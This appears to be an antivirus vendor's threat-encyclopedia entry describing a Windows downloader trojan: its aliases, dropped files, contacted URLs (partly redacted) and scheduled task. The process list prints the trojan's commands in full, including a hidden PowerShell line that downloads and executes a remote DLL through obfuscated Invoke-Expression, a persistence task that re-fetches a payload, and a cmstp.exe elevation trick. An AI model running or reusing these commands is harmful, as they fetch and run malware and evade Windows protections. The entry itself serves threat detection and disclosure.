Trojan.P97M.DLOADR.TIOIBEPN
February 01, 2022
ALIASES:
Trojan-Downloader.VBA.Agent (IKARUS)
PLATFORM:
Windows
OVERALL RISK RATING:
DAMAGE POTENTIAL:
DISTRIBUTION POTENTIAL:
REPORTED INFECTION:
INFORMATION EXPOSURE:
Threat Type: Trojan
Destructiveness: No
Encrypted:
In the wild: Yes
OVERVIEW
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
TECHNICAL DETAILS
File Size:
117,037 bytes
File Type:
Other
Memory Resident:
No
Initial Samples Received Date:
01 Feb 2022
Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
This Trojan drops the following files:
- %Public%\peee.com
- %Public%\hahahha.vbs
- %User Temp%\CMSTP.inf
It adds the following processes:
- %Public%\peee.com http://www.j.mp/akd{BLOCKED}
- powershell.exe -w h -NoProfile -ExecutionPolicy Bypass -Command (New-Object IO.StreamReader([Net.HttpWebRequest]::Create('https://www.me{BLOCKED}.com/file/ey{BLOCKED}/9.dll/file').GetResponse().GetResponseStream())).ReadToEnd()|I'e'x
- schtasks /create /sc MINUTE /mo 182 /tn asasdwddasdeyu /F /tr """%Public%/peee.com""""""https://www.me{BLOCKED}.com/file/ch{BLOCKED}/9.htm/file"""
- "%Windows%\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
- "%System%\cmstp.exe" /au %User Temp%\CMSTP.inf
- Wscript %Public%\hahahha.vbs
- "%System%\Wscript.exe" "%Public%\hahahha.vbs" /elevate
Other Details
This Trojan connects to the following possibly malicious URL:
- http://www.j.mp/akd{BLOCKED}
- http://bit.ly/akd{BLOCKED}
- https://www.me{BLOCKED}.com/file/4v{BLOCKED}/9.htm/file
- https://www.me{BLOCKED}.com/file/ey{BLOCKED}/9.dll/file
- https://www.me{BLOCKED}.com/file/vg{BLOCKED}/F2.vbs/file
It adds the following scheduled tasks:
- Task Name: asasdwddasdeyu
- Action: """%Public%/peee.com""""""https://www.me{BLOCKED}.com/file/ch{BLOCKED}/9.htm/file"""